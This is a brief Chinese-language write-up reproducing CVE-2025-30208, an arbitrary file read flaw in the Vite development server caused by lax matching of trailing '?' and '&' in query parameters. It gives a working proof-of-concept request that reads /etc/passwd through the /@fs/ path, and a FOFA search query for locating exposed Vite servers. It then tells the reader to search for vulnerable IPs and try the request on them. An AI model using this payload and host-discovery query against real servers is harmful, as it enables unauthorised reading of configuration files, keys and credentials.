CVE-2025-30208(文件读取)漏洞复现
一:漏洞信息
CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。
二:漏洞原理
漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?raw??或?import&raw??**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。
三:漏洞复现
1.fofa:body="/@vite/client"
poc:GET /@fs/etc/passwd?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx
2.在fofa搜索,寻找存在漏洞ip
3.尝试传参,得到相关信息。
